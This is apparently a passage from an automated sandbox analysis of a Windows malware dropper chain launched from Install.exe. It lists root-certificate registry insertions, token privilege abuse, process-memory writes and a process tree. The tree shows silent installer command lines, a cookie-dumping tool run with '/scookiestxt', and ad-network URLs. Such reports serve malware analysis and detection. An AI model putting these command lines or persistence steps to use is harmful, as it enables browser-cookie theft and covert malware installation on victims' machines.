c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	gpooe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	gpooe.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall39.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Laniriradi.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

3680 PING.EXE
2352 PING.EXE

pid	process
3680	PING.EXE
2352	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs

Processes:

001.exeinstaller.exegpooe.exegoogle-game.exehuesaa.exesetup.exeaskinstall39.exeSetup_v3.exe005.exeSunLabsPlayer.exe

pid	process
3768	001.exe
112	installer.exe
2212	gpooe.exe
2976	google-game.exe
3200	huesaa.exe
3332	setup.exe
3496	askinstall39.exe
3756	Setup_v3.exe
908	005.exe
2308	SunLabsPlayer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ultramediaburner.tmpLaniriradi.exe

pid	process
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

dw20.exeiexplore.exe

pid process

3832 dw20.exe
1992 iexplore.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Fessura.exe.com

pid process

3508 Fessura.exe.com

pid	process
3832	dw20.exe
1992	iexplore.exe

pid	process
3508	Fessura.exe.com

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Laniriradi.exemsiexec.exeinstaller.exe

description	pid	process
Token: SeDebugPrivilege	1432	Laniriradi.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeSecurityPrivilege	2476	msiexec.exe
Token: SeCreateTokenPrivilege	112	installer.exe
Token: SeAssignPrimaryTokenPrivilege	112	installer.exe
Token: SeLockMemoryPrivilege	112	installer.exe
Token: SeIncreaseQuotaPrivilege	112	installer.exe
Token: SeMachineAccountPrivilege	112	installer.exe
Token: SeTcbPrivilege	112	installer.exe
Token: SeSecurityPrivilege	112	installer.exe
Token: SeTakeOwnershipPrivilege	112	installer.exe
Token: SeLoadDriverPrivilege	112	installer.exe
Token: SeSystemProfilePrivilege	112	installer.exe
Token: SeSystemtimePrivilege	112	installer.exe
Token: SeProfSingleProcessPrivilege	112	installer.exe
Token: SeIncBasePriorityPrivilege	112	installer.exe
Token: SeCreatePagefilePrivilege	112	installer.exe
Token: SeCreatePermanentPrivilege	112	installer.exe
Token: SeBackupPrivilege	112	installer.exe
Token: SeRestorePrivilege	112	installer.exe
Token: SeShutdownPrivilege	112	installer.exe
Token: SeDebugPrivilege	112	installer.exe
Token: SeAuditPrivilege	112	installer.exe
Token: SeSystemEnvironmentPrivilege	112	installer.exe
Token: SeChangeNotifyPrivilege	112	installer.exe
Token: SeRemoteShutdownPrivilege	112	installer.exe
Token: SeUndockPrivilege	112	installer.exe
Token: SeSyncAgentPrivilege	112	installer.exe
Token: SeEnableDelegationPrivilege	112	installer.exe
Token: SeManageVolumePrivilege	112	installer.exe
Token: SeImpersonatePrivilege	112	installer.exe
Token: SeCreateGlobalPrivilege	112	installer.exe
Token: SeCreateTokenPrivilege	112	installer.exe
Token: SeAssignPrimaryTokenPrivilege	112	installer.exe
Token: SeLockMemoryPrivilege	112	installer.exe
Token: SeIncreaseQuotaPrivilege	112	installer.exe
Token: SeMachineAccountPrivilege	112	installer.exe
Token: SeTcbPrivilege	112	installer.exe
Token: SeSecurityPrivilege	112	installer.exe
Token: SeTakeOwnershipPrivilege	112	installer.exe
Token: SeLoadDriverPrivilege	112	installer.exe
Token: SeSystemProfilePrivilege	112	installer.exe
Token: SeSystemtimePrivilege	112	installer.exe
Token: SeProfSingleProcessPrivilege	112	installer.exe
Token: SeIncBasePriorityPrivilege	112	installer.exe
Token: SeCreatePagefilePrivilege	112	installer.exe
Token: SeCreatePermanentPrivilege	112	installer.exe
Token: SeBackupPrivilege	112	installer.exe
Token: SeRestorePrivilege	112	installer.exe
Token: SeShutdownPrivilege	112	installer.exe
Token: SeDebugPrivilege	112	installer.exe
Token: SeAuditPrivilege	112	installer.exe
Token: SeSystemEnvironmentPrivilege	112	installer.exe
Token: SeChangeNotifyPrivilege	112	installer.exe
Token: SeRemoteShutdownPrivilege	112	installer.exe
Token: SeUndockPrivilege	112	installer.exe
Token: SeSyncAgentPrivilege	112	installer.exe
Token: SeEnableDelegationPrivilege	112	installer.exe
Token: SeManageVolumePrivilege	112	installer.exe
Token: SeImpersonatePrivilege	112	installer.exe
Token: SeCreateGlobalPrivilege	112	installer.exe
Token: SeCreateTokenPrivilege	112	installer.exe
Token: SeAssignPrimaryTokenPrivilege	112	installer.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

ultramediaburner.tmpiexplore.exeinstaller.exe

pid process

1932 ultramediaburner.tmp
1992 iexplore.exe
112 installer.exe
1992 iexplore.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

iexplore.exeIEXPLORE.EXEgoogle-game.exeIEXPLORE.EXE

pid	process
1992	iexplore.exe
1992	iexplore.exe
1208	IEXPLORE.EXE
1208	IEXPLORE.EXE
1208	IEXPLORE.EXE
1208	IEXPLORE.EXE
2976	google-game.exe
2976	google-game.exe
1992	iexplore.exe
1992	iexplore.exe
8120	IEXPLORE.EXE
8120	IEXPLORE.EXE
8120	IEXPLORE.EXE
8120	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Install.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpZHarenujezhi.exeiexplore.exeLaniriradi.execmd.execmd.exeKiffMainE1.execmd.exe

description	pid	process	target process
PID 1628 wrote to memory of 2024	1628	Install.exe	Install.tmp
PID 1628 wrote to memory of 2024	1628	Install.exe	Install.tmp
PID 1628 wrote to memory of 2024	1628	Install.exe	Install.tmp
PID 1628 wrote to memory of 2024	1628	Install.exe	Install.tmp
PID 1628 wrote to memory of 2024	1628	Install.exe	Install.tmp
PID 1628 wrote to memory of 2024	1628	Install.exe	Install.tmp
PID 1628 wrote to memory of 2024	1628	Install.exe	Install.tmp
PID 2024 wrote to memory of 1776	2024	Install.tmp	Ultra.exe
PID 2024 wrote to memory of 1776	2024	Install.tmp	Ultra.exe
PID 2024 wrote to memory of 1776	2024	Install.tmp	Ultra.exe
PID 2024 wrote to memory of 1776	2024	Install.tmp	Ultra.exe
PID 1776 wrote to memory of 1032	1776	Ultra.exe	ultramediaburner.exe
PID 1776 wrote to memory of 1032	1776	Ultra.exe	ultramediaburner.exe
PID 1776 wrote to memory of 1032	1776	Ultra.exe	ultramediaburner.exe
PID 1776 wrote to memory of 1032	1776	Ultra.exe	ultramediaburner.exe
PID 1776 wrote to memory of 1032	1776	Ultra.exe	ultramediaburner.exe
PID 1776 wrote to memory of 1032	1776	Ultra.exe	ultramediaburner.exe
PID 1776 wrote to memory of 1032	1776	Ultra.exe	ultramediaburner.exe
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	ultramediaburner.tmp
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	ultramediaburner.tmp
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	ultramediaburner.tmp
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	ultramediaburner.tmp
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	ultramediaburner.tmp
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	ultramediaburner.tmp
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	ultramediaburner.tmp
PID 1776 wrote to memory of 748	1776	Ultra.exe	ZHarenujezhi.exe
PID 1776 wrote to memory of 748	1776	Ultra.exe	ZHarenujezhi.exe
PID 1776 wrote to memory of 748	1776	Ultra.exe	ZHarenujezhi.exe
PID 1776 wrote to memory of 1432	1776	Ultra.exe	Laniriradi.exe
PID 1776 wrote to memory of 1432	1776	Ultra.exe	Laniriradi.exe
PID 1776 wrote to memory of 1432	1776	Ultra.exe	Laniriradi.exe
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	UltraMediaBurner.exe
PID 748 wrote to memory of 1992	748	ZHarenujezhi.exe	iexplore.exe
PID 748 wrote to memory of 1992	748	ZHarenujezhi.exe	iexplore.exe
PID 748 wrote to memory of 1992	748	ZHarenujezhi.exe	iexplore.exe
PID 1992 wrote to memory of 1208	1992	iexplore.exe	IEXPLORE.EXE
PID 1992 wrote to memory of 1208	1992	iexplore.exe	IEXPLORE.EXE
PID 1992 wrote to memory of 1208	1992	iexplore.exe	IEXPLORE.EXE
PID 1992 wrote to memory of 1208	1992	iexplore.exe	IEXPLORE.EXE
PID 1432 wrote to memory of 3352	1432	Laniriradi.exe	cmd.exe
PID 1432 wrote to memory of 3352	1432	Laniriradi.exe	cmd.exe
PID 1432 wrote to memory of 3352	1432	Laniriradi.exe	cmd.exe
PID 3352 wrote to memory of 3600	3352	cmd.exe	KiffMainE1.exe
PID 3352 wrote to memory of 3600	3352	cmd.exe	KiffMainE1.exe
PID 3352 wrote to memory of 3600	3352	cmd.exe	KiffMainE1.exe
PID 1432 wrote to memory of 3704	1432	Laniriradi.exe	cmd.exe
PID 1432 wrote to memory of 3704	1432	Laniriradi.exe	cmd.exe
PID 1432 wrote to memory of 3704	1432	Laniriradi.exe	cmd.exe
PID 3704 wrote to memory of 3768	3704	cmd.exe	001.exe
PID 3704 wrote to memory of 3768	3704	cmd.exe	001.exe
PID 3704 wrote to memory of 3768	3704	cmd.exe	001.exe
PID 3704 wrote to memory of 3768	3704	cmd.exe	001.exe
PID 3600 wrote to memory of 3832	3600	KiffMainE1.exe	dw20.exe
PID 3600 wrote to memory of 3832	3600	KiffMainE1.exe	dw20.exe
PID 3600 wrote to memory of 3832	3600	KiffMainE1.exe	dw20.exe
PID 1432 wrote to memory of 4056	1432	Laniriradi.exe	cmd.exe
PID 1432 wrote to memory of 4056	1432	Laniriradi.exe	cmd.exe
PID 1432 wrote to memory of 4056	1432	Laniriradi.exe	cmd.exe
PID 4056 wrote to memory of 112	4056	cmd.exe	installer.exe
PID 4056 wrote to memory of 112	4056	cmd.exe	installer.exe
PID 4056 wrote to memory of 112	4056	cmd.exe	installer.exe

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Users\Admin\AppData\Local\Temp\is-J3DRB.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-J3DRB.tmp\Install.tmp" /SL5="$8015C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Users\Admin\AppData\Local\Temp\is-D27HT.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-D27HT.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Program Files\Internet Explorer\EGNXVROZLN\ultramediaburner.exe
      "C:\Program Files\Internet Explorer\EGNXVROZLN\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1032
    - - C:\Users\Admin\AppData\Local\Temp\is-BNLSA.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BNLSA.tmp\ultramediaburner.tmp" /SL5="$6012E,281924,62464,C:\Program Files\Internet Explorer\EGNXVROZLN\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1932
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:564
  - - C:\Users\Admin\AppData\Local\Temp\70-7325e-3e7-f18ae-d292acb505619\ZHarenujezhi.exe
      "C:\Users\Admin\AppData\Local\Temp\70-7325e-3e7-f18ae-d292acb505619\ZHarenujezhi.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:748
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        5⤵
        Modifies Internet Explorer settings
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1992
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1992 CREDAT:275457 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1208
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1992 CREDAT:668680 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:8120
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        5⤵
        
        PID:8160
  - - C:\Users\Admin\AppData\Local\Temp\87-a6bc8-287-95fb6-2db5e085cccd8\Laniriradi.exe
      "C:\Users\Admin\AppData\Local\Temp\87-a6bc8-287-95fb6-2db5e085cccd8\Laniriradi.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1432
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ddqhuhi.3n1\KiffMainE1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3352
      - C:\Users\Admin\AppData\Local\Temp\5ddqhuhi.3n1\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\5ddqhuhi.3n1\KiffMainE1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3600
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 528
        7⤵
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3832
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1kgvvwwh.jbw\001.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3704
      - C:\Users\Admin\AppData\Local\Temp\1kgvvwwh.jbw\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\1kgvvwwh.jbw\001.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3768
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe /qn CAMPAIGN="654"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:112
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619983796 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:4068
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrctvabx.hbn\gpooe.exe & exit
        5⤵
        
        PID:2120
      - C:\Users\Admin\AppData\Local\Temp\lrctvabx.hbn\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\lrctvabx.hbn\gpooe.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:7876
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:7612
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ugu3tzxd.3z0\google-game.exe & exit
        5⤵
        
        PID:2880
      - C:\Users\Admin\AppData\Local\Temp\ugu3tzxd.3z0\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\ugu3tzxd.3z0\google-game.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of SetWindowsHookEx
        
        PID:2976
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        7⤵
        
        PID:3032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owebemxl.dvf\huesaa.exe & exit
        5⤵
        
        PID:3140
      - C:\Users\Admin\AppData\Local\Temp\owebemxl.dvf\huesaa.exe
        
        C:\Users\Admin\AppData\Local\Temp\owebemxl.dvf\huesaa.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
